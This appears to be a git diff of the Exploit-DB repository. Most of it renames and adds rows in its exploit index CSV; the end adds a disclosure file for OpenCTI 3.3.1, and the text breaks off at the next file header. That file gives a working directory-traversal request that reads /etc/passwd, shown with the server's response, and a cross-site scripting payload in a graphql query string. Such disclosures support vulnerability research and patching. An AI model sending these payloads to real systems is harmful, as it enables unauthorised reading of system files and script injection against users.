-38449,exploits/hardware/webapps/38449.txt,"NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",webapps,hardware, +38449,exploits/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",webapps,hardware, 38450,exploits/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",webapps,php, 38455,exploits/hardware/webapps/38455.txt,"ZYXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",webapps,hardware, 38476,exploits/php/webapps/38476.txt,"Todoo Forum 2.0 - 'todooforum.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-14,"Chiekh Bouchenafa",webapps,php, @@ -38797,7 +38798,7 @@ id,file,description,date,author,type,platform,port 39352,exploits/php/webapps/39352.txt,"Fonality trixbox - 'index.php' Remote Code Execution",2014-07-17,AtT4CKxT3rR0r1ST,webapps,php, 39354,exploits/php/webapps/39354.pl,"Ramui Forum Script 9.0 - SQL Injection",2016-01-28,bd0rk,webapps,php,80 39355,exploits/php/webapps/39355.txt,"Ramui Web Hosting Directory Script 4.0 - Remote File Inclusion",2016-01-28,bd0rk,webapps,php,80 -39356,exploits/hardware/webapps/39356.py,"NETGEAR WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",webapps,hardware,80 +39356,exploits/hardware/webapps/39356.py,"Netgear WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",webapps,hardware,80 39382,exploits/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,webapps,multiple, 39384,exploits/php/webapps/39384.txt,"WordPress Plugin Simple Add Pages or Posts 1.6 - Cross-Site Request Forgery",2016-01-29,ALIREZA_PROMIS,webapps,php, 39385,exploits/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",webapps,php,80 @@ -38813,7 +38814,7 @@ id,file,description,date,author,type,platform,port 39409,exploits/hardware/webapps/39409.txt,"D-Link DVG­N5402SP - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",webapps,hardware, 39410,exploits/php/webapps/39410.txt,"WordPress Plugin User Meta Manager 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",webapps,php,80 39411,exploits/php/webapps/39411.txt,"WordPress Plugin User Meta Manager 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",webapps,php,80 -39412,exploits/hardware/webapps/39412.txt,"NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",webapps,hardware, +39412,exploits/hardware/webapps/39412.txt,"Netgear NMS300 ProSafe Network Management System - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",webapps,hardware, 39413,exploits/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",webapps,php,80 39414,exploits/php/webapps/39414.txt,"OpenDocMan 1.3.4 - Cross-Site Request Forgery",2016-02-04,"Curesec Research Team",webapps,php,80 39415,exploits/php/webapps/39415.txt,"ATutor 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2016-02-04,"Curesec Research Team",webapps,php,80 @@ -39402,8 +39403,8 @@ id,file,description,date,author,type,platform,port 40856,exploits/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",webapps,hardware, 40877,exploits/php/webapps/40877.md,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",webapps,php, 40887,exploits/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,webapps,hardware, -40889,exploits/cgi/webapps/40889.txt,"NETGEAR R7000 - Command Injection",2016-12-07,Acew0rm,webapps,cgi, -40898,exploits/hardware/webapps/40898.txt,"NETGEAR R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",webapps,hardware, +40889,exploits/cgi/webapps/40889.txt,"Netgear R7000 - Command Injection",2016-12-07,Acew0rm,webapps,cgi, +40898,exploits/hardware/webapps/40898.txt,"Netgear R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",webapps,hardware, 40901,exploits/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",webapps,hardware, 40904,exploits/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",webapps,php, 40908,exploits/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,webapps,php,80 @@ -39578,7 +39579,7 @@ id,file,description,date,author,type,platform,port 41198,exploits/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",webapps,php, 41199,exploits/php/webapps/41199.txt,"Itech Video Sharing Script 4.94 - 'v' SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php, 41200,exploits/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",webapps,php, -41205,exploits/hardware/webapps/41205.py,"NETGEAR Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",webapps,hardware, +41205,exploits/hardware/webapps/41205.py,"Netgear Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",webapps,hardware, 41201,exploits/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php, 41202,exploits/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php, 41203,exploits/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php, @@ -39714,7 +39715,7 @@ id,file,description,date,author,type,platform,port 41391,exploits/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php, 41392,exploits/php/webapps/41392.html,"RSS News AutoPilot Script 1.0.1/3.0.3 - Cross-Site Request Forgery",2016-08-30,"Arbin Godar",webapps,php, 41393,exploits/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php, -41394,exploits/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,webapps,hardware, +41394,exploits/hardware/webapps/41394.py,"Netgear DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,webapps,hardware, 41395,exploits/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,webapps,windows, 41396,exploits/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,webapps,php, 41399,exploits/php/webapps/41399.txt,"Joomla! Component MaQma Helpdesk 4.2.7 - 'id' SQL Injection",2017-02-20,"Ihsan Sencan",webapps,php, @@ -39760,7 +39761,7 @@ id,file,description,date,author,type,platform,port 41453,exploits/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",webapps,multiple, 41455,exploits/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,webapps,php, 41456,exploits/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php, -41459,exploits/hardware/webapps/41459.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,webapps,hardware, +41459,exploits/hardware/webapps/41459.py,"Netgear DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,webapps,hardware, 41460,exploits/php/webapps/41460.txt,"Joomla! Component Gnosis 1.1.2 - 'id' SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php, 41461,exploits/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",webapps,multiple, 41462,exploits/php/webapps/41462.txt,"Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php, @@ -39769,7 +39770,7 @@ id,file,description,date,author,type,platform,port 41465,exploits/php/webapps/41465.txt,"Joomla! Component JomSocial - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php, 41466,exploits/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",webapps,java, 41470,exploits/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",webapps,php, -41472,exploits/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,webapps,hardware, +41472,exploits/hardware/webapps/41472.html,"Netgear DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,webapps,hardware, 41478,exploits/hardware/webapps/41478.txt,"D-Link DSL-2730U Wireless N 150 - Cross-Site Request Forgery",2017-03-01,"B GOVIND",webapps,hardware, 41492,exploits/php/webapps/41492.txt,"Php Classified OLX Clone Script - 'category' SQL Injection",2017-03-02,"Ihsan Sencan",webapps,php, 41482,exploits/xml/webapps/41482.txt,"Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting",2017-03-01,"SEC Consult",webapps,xml, @@ -39822,7 +39823,7 @@ id,file,description,date,author,type,platform,port 41535,exploits/php/webapps/41535.txt,"Select Your College Script 2.01 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, 41536,exploits/php/webapps/41536.txt,"Social Network Script 3.01 - 'id' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, 41539,exploits/php/webapps/41539.txt,"Website Broker Script 3.02 - 'view' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, -41540,exploits/php/webapps/41540.py,"Multiple WordPress Plugins - Arbitrary File Upload",2017-03-03,"The Martian",webapps,php, +41540,exploits/php/webapps/41540.py,"Multiple WordPress Plugins - Arbitrary File Upload",2017-03-03,"The Martian",webapps,php, 41541,exploits/json/webapps/41541.html,"Deluge Web UI 1.3.13 - Cross-Site Request Forgery",2017-03-06,"Kyle Neideck",webapps,json, 41543,exploits/php/webapps/41543.txt,"Mini CMS 1.1 - 'name' SQL Injection",2017-03-07,"Ihsan Sencan",webapps,php, 41544,exploits/php/webapps/41544.txt,"Daily Deals Script 1.0 - 'id' SQL Injection",2017-03-07,"Ihsan Sencan",webapps,php, @@ -40583,7 +40584,7 @@ id,file,description,date,author,type,platform,port 42950,exploits/php/webapps/42950.txt,"EPESI 1.8.2 rev20170830 - Cross-Site Scripting",2017-10-03,"Zeeshan Shaikh",webapps,php, 42953,exploits/windows/webapps/42953.txt,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)",2017-09-20,xxlegend,webapps,windows, 42954,exploits/php/webapps/42954.py,"ClipBucket 2.8.3 - Remote Code Execution",2017-10-04,"Meisam Monsef",webapps,php, -42956,exploits/hardware/webapps/42956.txt,"NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",webapps,hardware, +42956,exploits/hardware/webapps/42956.txt,"Netgear ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",webapps,hardware, 42959,exploits/php/webapps/42959.py,"Unitrends UEB 9.1 - Privilege Escalation",2017-08-08,"Jared Arave",webapps,php, 42961,exploits/ruby/webapps/42961.txt,"Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery",2017-08-30,"Dhiraj Mishra",webapps,ruby, 42966,exploits/jsp/webapps/42966.py,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)",2017-10-09,intx0x80,webapps,jsp, @@ -41523,7 +41524,7 @@ id,file,description,date,author,type,platform,port 45737,exploits/php/webapps/45737.txt,"Electricks eCommerce 1.0 - 'prodid' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80 45739,exploits/php/webapps/45739.txt,"phptpoint Pharmacy Management System 1.0 - 'username' SQL Injection",2018-10-30,"Boumediene KADDOUR",webapps,php,80 45740,exploits/php/webapps/45740.txt,"Webiness Inventory 2.9 - Arbitrary File Upload",2018-10-30,"Boumediene KADDOUR",webapps,php,80 -45741,exploits/hardware/webapps/45741.txt,"NETGEAR WiFi Router R6120 - Credential Disclosure",2018-10-30,Wadeek,webapps,hardware,80 +45741,exploits/hardware/webapps/45741.txt,"Netgear WiFi Router R6120 - Credential Disclosure",2018-10-30,Wadeek,webapps,hardware,80 45747,exploits/php/webapps/45747.txt,"MyBB Downloads 2.0.3 - SQL Injection",2018-10-30,"Lucian Ioan Nitescu",webapps,php,80 45751,exploits/php/webapps/45751.txt,"Expense Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80 45752,exploits/php/webapps/45752.txt,"University Application System 1.0 - SQL Injection / Cross-Site Request Forgery (Add Admin)",2018-10-30,"Ihsan Sencan",webapps,php,80 @@ -42116,7 +42117,7 @@ id,file,description,date,author,type,platform,port 47110,exploits/java/webapps/47110.py,"Sahi Pro 8.0.0 - Remote Command Execution",2019-07-12,AkkuS,webapps,java, 47111,exploits/java/webapps/47111.txt,"Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting",2019-07-12,"Ishaq Mohammed",webapps,java, 47112,exploits/cgi/webapps/47112.py,"Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution",2019-07-12,"Chris Lyne",webapps,cgi, -47117,exploits/hardware/webapps/47117.txt,"NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass",2019-07-15,Wadeek,webapps,hardware, +47117,exploits/hardware/webapps/47117.txt,"Netgear WiFi Router JWNR2010v5 / R6080 - Authentication Bypass",2019-07-15,Wadeek,webapps,hardware, 47118,exploits/hardware/webapps/47118.txt,"CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities",2019-07-15,Ramikan,webapps,hardware, 47121,exploits/php/webapps/47121.txt,"FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion",2019-07-15,"Mohammed Althibyani",webapps,php,80 47123,exploits/linux/webapps/47123.txt,"CentOS Control Web Panel 0.9.8.836 - Authentication Bypass",2019-07-16,"Pongtorn Angsuchotmetee",webapps,linux, @@ -42520,7 +42521,7 @@ id,file,description,date,author,type,platform,port 48026,exploits/xml/webapps/48026.txt,"ExpertGPS 6.38 - XML External Entity Injection",2020-02-07,"Trent Gordon",webapps,xml, 48027,exploits/multiple/webapps/48027.txt,"Google Invisible RECAPTCHA 3 - Spoof Bypass",2020-02-07,Matamorphosis,webapps,multiple, 48029,exploits/multiple/webapps/48029.txt,"Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting",2020-02-10,"Prasenjit Kanti Paul",webapps,multiple, -48030,exploits/php/webapps/48030.txt,"WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting",2020-02-10,"Jinson Varghese Behanan",webapps,php, +48030,exploits/php/webapps/48030.txt,"WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting",2020-02-10,"Jinson Varghese Behanan",webapps,php, 48040,exploits/cgi/webapps/48040.txt,"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting",2020-02-11,Luca.Chiou,webapps,cgi, 48042,exploits/php/webapps/48042.txt,"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting",2020-02-11,"Sayak Naskar",webapps,php, 48047,exploits/php/webapps/48047.rb,"WordPress Plugin InfiniteWP - Client Authentication Bypass (Metasploit)",2020-02-11,Metasploit,webapps,php,80 @@ -42704,7 +42705,7 @@ id,file,description,date,author,type,platform,port 48433,exploits/php/webapps/48433.txt,"MPC Sharj 3.11.1 - Arbitrary File Download",2020-05-06,SajjadBnd,webapps,php, 48435,exploits/php/webapps/48435.txt,"Car Park Management System 1.0 - Authentication Bypass",2020-05-07,"Tarun Sehgal",webapps,php, 48436,exploits/hardware/webapps/48436.txt,"Draytek VigorAP 1000C - Persistent Cross-Site Scripting",2020-05-07,Vulnerability-Lab,webapps,hardware, -48437,exploits/php/webapps/48437.txt,"School File Management System 1.0 - 'username' SQL Injection",2020-05-07,"Tarun Sehgal",webapps,php, +48437,exploits/php/webapps/48437.txt,"School File Management System 1.0 - 'username' SQL Injection",2020-05-07,"Tarun Sehgal",webapps,php, 48438,exploits/php/webapps/48438.txt,"Online Clothing Store 1.0 - Arbitrary File Upload",2020-05-07,"Sushant Kamble",webapps,php, 48439,exploits/php/webapps/48439.txt,"Pisay Online E-Learning System 1.0 - Remote Code Execution",2020-05-07,boku,webapps,php, 48440,exploits/php/webapps/48440.txt,"Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection",2020-05-07,BKpatron,webapps,php, @@ -42720,7 +42721,7 @@ id,file,description,date,author,type,platform,port 48453,exploits/multiple/webapps/48453.txt,"LibreNMS 1.46 - 'search' SQL Injection",2020-05-11,Punt,webapps,multiple, 48454,exploits/linux/webapps/48454.py,"Phase Botnet - Blind SQL Injection",2014-12-23,MalwareTech,webapps,linux, 48456,exploits/aspx/webapps/48456.txt,"Orchard Core RC1 - Persistent Cross-Site Scripting",2020-05-12,SunCSR,webapps,aspx, -48457,exploits/php/webapps/48457.txt,"ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection",2020-05-12,SunCSR,webapps,php, +48457,exploits/php/webapps/48457.txt,"WordPress Plugin ChopSlider 3.4 - 'id' SQL Injection",2020-05-12,SunCSR,webapps,php, 48458,exploits/php/webapps/48458.txt,"CuteNews 2.1.2 - Authenticated Arbitrary File Upload",2020-05-12,"Nhat Ha",webapps,php, 48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",2020-05-12,"Dylan Garnaud",webapps,java, 48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",2020-05-12,Besim,webapps,php, @@ -42733,7 +42734,7 @@ id,file,description,date,author,type,platform,port 48472,exploits/php/webapps/48472.py,"vBulletin 5.6.1 - 'nodeId' SQL Injection",2020-05-15,Photubias,webapps,php, 48473,exploits/java/webapps/48473.txt,"ManageEngine Service Desk 10.0 - Cross-Site Scripting",2020-05-15,"Felipe Molina",webapps,java, 48474,exploits/hardware/webapps/48474.txt,"Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection",2020-05-18,jul10l1r4,webapps,hardware, -48475,exploits/php/webapps/48475.txt,"Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection",2020-05-18,"Nguyen Khang",webapps,php, +48475,exploits/php/webapps/48475.txt,"WordPress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection",2020-05-18,"Nguyen Khang",webapps,php, 48476,exploits/php/webapps/48476.txt,"Online Examination System 1.0 - 'eid' SQL Injection",2020-05-18,BKpatron,webapps,php, 48477,exploits/java/webapps/48477.txt,"Oracle Hospitality RES 3700 5.7 - Remote Code Execution",2020-05-18,"Walid Faour",webapps,java, 48478,exploits/php/webapps/48478.txt,"forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting",2020-05-18,"Daniel Ortiz",webapps,php, @@ -42755,7 +42756,7 @@ id,file,description,date,author,type,platform,port 48500,exploits/multiple/webapps/48500.txt,"OpenEDX platform Ironwood 2.5 - Remote Code Execution",2020-05-21,"Daniel Monzón",webapps,multiple, 48504,exploits/php/webapps/48504.txt,"Dolibarr 11.0.3 - Persistent Cross-Site Scripting",2020-05-22,"Mehmet Kelepçe",webapps,php, 48506,exploits/php/webapps/48506.py,"Gym Management System 1.0 - Unauthenticated Remote Code Execution",2020-05-22,boku,webapps,php, -48509,exploits/php/webapps/48509.txt,"Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php, +48509,exploits/php/webapps/48509.txt,"WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php, 48511,exploits/php/webapps/48511.txt,"Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting",2020-05-25,"Nitya Nand",webapps,php, 48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php, 48515,exploits/php/webapps/48515.py,"OpenEMR 5.0.1 - Remote Code Execution",2020-05-26,"Musyoka Ian",webapps,php, @@ -42775,7 +42776,7 @@ id,file,description,date,author,type,platform,port 48531,exploits/php/webapps/48531.py,"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution",2020-05-28,Th3GundY,webapps,php, 48532,exploits/php/webapps/48532.txt,"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)",2020-05-29,UnD3sc0n0c1d0,webapps,php, 48533,exploits/multiple/webapps/48533.py,"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass",2020-05-29,"Halis Duraki",webapps,multiple, -48534,exploits/php/webapps/48534.py,"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation",2020-06-01,"Raphael Karger",webapps,php, +48534,exploits/php/webapps/48534.py,"WordPress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation",2020-06-01,"Raphael Karger",webapps,php, 48535,exploits/multiple/webapps/48535.txt,"VMware vCenter Server 6.7 - Authentication Bypass",2020-06-01,Photubias,webapps,multiple, 48536,exploits/php/webapps/48536.py,"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution",2020-06-01,s1gh,webapps,php, 48538,exploits/php/webapps/48538.txt,"Clinic Management System 1.0 - Authentication Bypass",2020-06-02,BKpatron,webapps,php, @@ -42803,8 +42804,10 @@ id,file,description,date,author,type,platform,port 48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php, 48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php, 48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php, -48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php, +48572,exploits/php/webapps/48572.txt,"Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php, 48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php, 48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple, 48581,exploits/multiple/webapps/48581.txt,"Avaya IP Office 11 - Password Disclosure",2020-06-12,hyp3rlinx,webapps,multiple, 48582,exploits/multiple/webapps/48582.txt,"Sysax MultiServer 6.90 - Reflected Cross Site Scripting",2020-06-12,"Luca Epifanio",webapps,multiple, +48588,exploits/hardware/webapps/48588.py,"Netgear R7000 Router - Remote Code Execution",2020-06-15,grimm-co,webapps,hardware, +48590,exploits/php/webapps/48590.py,"Gila CMS 1.11.8 - 'query' SQL Injection",2020-06-16,BillyV4,webapps,php, From 7312a8330de86e9097f803ce5b42df072b01855d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 18 Jun 2020 05:01:57 +0000 Subject: [PATCH 16/17] DB: 2020-06-18 3 changes to exploits/shellcodes Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC) College-Management-System-Php 1.0 - Authentication Bypass OpenCTI 3.3.1 - Directory Traversal --- exploits/multiple/webapps/48595.txt | 100 ++++++++++++++++++++++++++ exploits/php/webapps/48593.txt | 35 +++++++++ exploits/windows/local/48594.py | 108 ++++++++++++++++++++++++++++ files_exploits.csv | 3 + 4 files changed, 246 insertions(+) create mode 100644 exploits/multiple/webapps/48595.txt create mode 100644 exploits/php/webapps/48593.txt create mode 100755 exploits/windows/local/48594.py diff --git a/exploits/multiple/webapps/48595.txt b/exploits/multiple/webapps/48595.txt new file mode 100644 index 000000000..e0462aaf9 --- /dev/null +++ b/exploits/multiple/webapps/48595.txt @@ -0,0 +1,100 @@ +# Exploit Title: OpenCTI 3.3.1 - Directory Traversal +# Date: 2020-03-05 +# Exploit Author: Raif Berkay Dincel +# Vendor Homepage: www.opencti.io/ +# Software [https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1] +# Version: [3.3.1] +# CVE-ID: N/A +# Tested on: Linux Mint / Windows 10 +# Vulnerabilities Discovered Date : 2020/03/05 [YYYY/MM/DD] + +# As a result of the research, two vulnerability were identified. (Directory Traversal & Cross Site Scripting [XSS]) +# Technical information is provided below step by step. + +# [1] - Directory Traversal Vulnerability + +# Vulnerable Parameter Type: GET +# Vulnerable Parameter: TARGET/static/css/[Payload] + +# Proof of Concepts: +https://TARGET/static/css//../../../../../../../../etc/passwd + +# HTTP Request: + +GET /static/css//../../../../../../../../etc/passwd HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: connect.sid=s%3ATkG_XOPI-x4FclzoLAZvx_oBEHaTkG4N.kwp3h9LAyBrG03SzzT8ApZu0CRaUwI5CP7yizXTerYM; opencti_token=df8635b1-39b5-41c2-8873-2f19b0e6ca8c +Upgrade-Insecure-Requests: 1 + +# HTTP Response + +HTTP/1.1 200 OK +X-DNS-Prefetch-Control: off +X-Frame-Options: SAMEORIGIN +Strict-Transport-Security: max-age=15552000; includeSubDomains +X-Download-Options: noopen +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +Content-Type: text/css; charset=utf-8 +ETag: W/"500-eiHlcjY0lWovE9oQsRof3WWtG1o" +Vary: Accept-Encoding +Date: Sun, 03 May 2020 01:25:21 GMT +Connection: close +Content-Length: 1280 + +root:x:0:0:root:/root:/bin/ash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +news:x:9:13:news:/usr/lib/news:/sbin/nologin +uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +man:x:13:15:man:/usr/man:/sbin/nologin +postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin +cron:x:16:16:cron:/var/spool/cron:/sbin/nologin +ftp:x:21:21::/var/lib/ftp:/sbin/nologin +sshd:x:22:22:sshd:/dev/null:/sbin/nologin +at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin +squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin +xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin +games:x:35:35:games:/usr/games:/sbin/nologin +postgres:x:70:70::/var/lib/postgresql:/bin/sh +cyrus:x:85:12::/usr/cyrus:/sbin/nologin +vpopmail:x:89:89::/var/vpopmail:/sbin/nologin +ntp:x:123:123:NTP:/var/empty:/sbin/nologin +smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin +guest:x:405:100:guest:/dev/null:/sbin/nologin +nobody:x:65534:65534:nobody:/:/sbin/nologin +node:x:1000:1000:Linux User,,,:/home/node:/bin/sh + + +# [2] - Cross Site Scripting (XSS) Vulnerability + +# Vulnerable Parameter Type: GET +# Vulnerable Parameter: TARGET/graphql?[Payload] + +# Proof of Concepts: +TARGET/graphql?'"--> + +https://TARGET/graphql?%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%27Raif_Berkay%27)%3C/scRipt%3E + +# HTTP Request: + +GET /graphql?'"--> HTTP/1.1 +Host: TARGET +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: en-us,en;q=0.5 +Cache-Control: no-cache +Cookie: opencti_token=2b4f29e3-5ea8-4890-8cf5-a76f61f1e2b2; connect.sid=s%3AB8USExilsGXulGOc09fo92piRjpWNtUo.GZ9pmhOf7i1l78t%2BHVk9zh9AQ9BTO%2BHvCRix3iXv6iw +User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 \ No newline at end of file diff --git a/exploits/php/webapps/48593.txt 